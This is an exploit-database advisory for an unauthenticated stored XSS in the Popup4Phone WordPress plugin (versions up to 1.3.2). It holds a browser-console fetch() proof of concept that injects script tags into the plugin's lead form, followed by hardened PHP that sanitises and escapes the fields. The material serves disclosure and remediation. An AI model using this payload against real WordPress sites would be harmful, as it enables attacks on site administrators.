wpexploit | Bob Matyas | WPEX-ID:81DBB5C0-CCDD-4AF1-B2F2-71CB1B37FE93
History: Apr 26, 2024 - 12:00 a.m.

Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS

2024-04-26 00:00:00
Bob Matyas
33
Tags: popup4phone, unauthenticated, stored xss, poc, may 10 2024, update, exploit

AI Score: 6.2 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.

Run the following JavaScript in the browser console:

```javascript
// PoC from the advisory: an unauthenticated POST of the plugin's lead form,
// with script tags in the name and phone fields, stored and later rendered
// unescaped on the admin "Leads" page.
fetch("/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40example.com&popup4phone%5Bmessage%5D=test&ajax=1",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

After running the JavaScript, log in as an admin and browse to "Popup4Phone > Leads" to see the XSS trigger.
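As an added illustration of the missing steps (sanitise on write, escape on read), here is a hardened lead handler written against the form fields seen in the PoC request; it is not Popup4Phone's own code, and the function names and storage layout are assumptions. Only WordPress core sanitising and escaping functions are used.

```php
<?php
// Hypothetical hardened handler (not the plugin's code). Field names match
// the popup4phone[...] parameters in the PoC; everything else is assumed.

function p4p_save_lead_hardened( array $post ) {
    $in = ( isset( $post['popup4phone'] ) && is_array( $post['popup4phone'] ) )
        ? $post['popup4phone'] : array();

    // Sanitise on the way in: the submitter is unauthenticated, so every
    // field gets the narrowest WordPress sanitiser that fits its type.
    $lead = array(
        'name'       => sanitize_text_field( wp_unslash( $in['name'] ?? '' ) ),
        'phone'      => sanitize_text_field( wp_unslash( $in['phone'] ?? '' ) ),
        'email'      => sanitize_email( wp_unslash( $in['email'] ?? '' ) ),
        'message'    => sanitize_textarea_field( wp_unslash( $in['message'] ?? '' ) ),
        'page_url'   => esc_url_raw( wp_unslash( $in['ws_pages_submit_url'] ?? '' ) ),
        'page_title' => sanitize_text_field( wp_unslash( $in['ws_pages_submit_title'] ?? '' ) ),
    );

    // Reject a malformed address rather than storing whatever survived.
    if ( '' !== $lead['email'] && ! is_email( $lead['email'] ) ) {
        $lead['email'] = '';
    }
    return $lead; // caller persists this array (e.g. as a custom post or option)
}

function p4p_render_lead_row_hardened( array $lead ) {
    // Escape again on the way out. Input sanitising is not a substitute:
    // rows stored before the fix, or via another path, must not run as HTML
    // in the admin "Leads" screen.
    return sprintf(
        '<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td><a href="%s">%s</a></td></tr>',
        esc_html( $lead['name'] ),
        esc_html( $lead['phone'] ),
        esc_html( $lead['email'] ),
        esc_html( $lead['message'] ),
        esc_url( $lead['page_url'] ),
        esc_html( $lead['page_title'] )
    );
}
```

With the PoC body above, sanitize_text_field() strips the script tags before storage and esc_html() turns any remaining quotes and angle brackets into entities at render time, so the Leads page shows the payload as text instead of executing it.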
